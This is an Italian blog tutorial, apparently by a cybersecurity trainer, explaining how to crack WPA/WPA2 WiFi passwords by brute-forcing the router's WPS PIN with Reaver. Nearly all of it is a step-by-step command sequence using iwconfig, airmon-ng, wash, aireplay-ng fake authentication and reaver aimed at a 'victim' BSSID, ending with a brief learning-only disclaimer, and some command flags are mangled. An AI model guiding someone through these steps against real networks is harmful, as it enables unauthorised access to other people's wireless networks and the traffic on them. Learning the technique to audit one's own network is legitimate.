Come hackerare WPA/WPA2 WiFi con Reaver

Sappiamo tutti che la maggior parte delle persone preferisce mettere una password WiFi alla propria connessione wireless. Questa potrebbe essere semplice come 12345 o complessa come una combinazione di più lettere, numeri e caratteri. Bene, ecco la cattiva notizia, c’è uno strumento di nome reaver che può essere usato per craccare la tua password WAP/WAP2 WiFi.

Su WEP, WAP e WAP2

Per migliorare le funzioni di WEP (Wired Equivalent Privacy), WiFi Protected Access o WPA è stato creato nel 2003. Questo miglioramento temporaneo ha ancora una sicurezza relativamente scarsa, ma è più facile da configurare. WPA usa il Temporal Key Integrity Protocol (TKIP) per una crittografia più sicura di quella offerta da WEP.

Un anno dopo, nel 2004, WiFi Protected Access 2 è diventato disponibile. WPA2 ha una sicurezza più forte ed è più facile da configurare rispetto alle opzioni precedenti. La differenza principale con WPA2 è che usa l’Advanced Encryption Standard (AES) invece di TKIP.

Cosa ti serve.

  • Un adattatore WiFi che supporti la modalità monitor
  • Un computer con WiFi
  • Una rete WiFi protetta da WPA nelle vicinanze
  • Reaver installato
  • Persistenza

Suppongo che il tuo router sia configurato per non usare la Push Button Authentication.(PBC)

Facciamo così

Prima di tutto, se stai usando una macchina virtuale, devi abilitare il tuo controller USB andando nelle impostazioni, poi clicca su USB e scegli il tuo dispositivo USB.

NB: Assicurati che l’adattatore wireless che stai usando supporti la modalità monitor.

Dopo di che, esegui il seguente comando:

iwconfig

Questo comando ti mostra solo le interfacce wireless

Esegui:

sudo ifconfig wlan0 down

Questo disattiva il WiFi

Quindi:

sudo airmon-ng check kill

Questo comando uccide qualsiasi processo che potrebbe interferire con l’utilizzo della mia interfaccia in modalità monitor. Uccide il gestore di rete in modo che non ci sia internet.

Quindi esegui:

iwconfig wlan0 mode monitor

Questo comando cambia la modalità da modalità gestita a modalità monitor.

La modalità gestita è la modalità predefinita per tutti i dispositivi wireless.

Il motivo per cui abbiamo bisogno di cambiare la modalità da gestita a monitor è perché non vogliamo solo catturare i pacchetti che hanno il mac address del nostro dispositivo ma tutti i pacchetti, anche quelli inviati al router e ad altri dispositivi. Questo è possibile solo quando l’adattatore WiFi è in modalità monitor.

Poi esegui:

sudo ifconfig wlan0 up

Questo riporta il wifi su.

Poi esegui:

iwconfig

Questo è per controllare se la nostra modalità è cambiata da managed a monitor. Se è così, dovrebbe essere indicato nel terminale.

La figura qui sotto mostra che la modalità è cambiata in monitor.

wash - interface wlan0

Questo mostra tutti gli Aps abilitati WPS che usano l’interfaccia wireless.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

Per il mac ID apri una nuova scheda e digita ifconfig. Copia le prime 12 cifre da unspec in wlan0.

Non premere ancora INVIO.

Apri un’altra nuova scheda.

Assicurati di avere reaver installato. Se non ce l’hai, esegui il seguente comando.

Sudo apt-get install aircrack-ng reaver

Questo installerà reaver.

Reaver forza il pin e lo associa all’obiettivo, una volta che ha il pin, lo usa per calcolare la chiave WAP/WAP2 effettiva.

Poi esegui il seguente comando:

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Metti invio in questa scheda e premi anche invio nell’altra scheda che ti ho detto di non premere invio.

Questo dovrebbe richiedere un paio di minuti poiché sta provando tutte le combinazioni possibili e alla fine ti darà il pin WPS, la password WAP e il nome del Wi-Fi

DISCLAIMER. Questo articolo è a scopo di apprendimento, non siamo responsabili per qualsiasi danno causato facendo riferimento ad esso.

Articolo di Restercuter Nyawira, un membro di SheHacks KE, formatore e appassionato di cybersecurity. Trovatela su LinkedIn (Restercuter Nyawira) e Twitter @Restercuter1.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.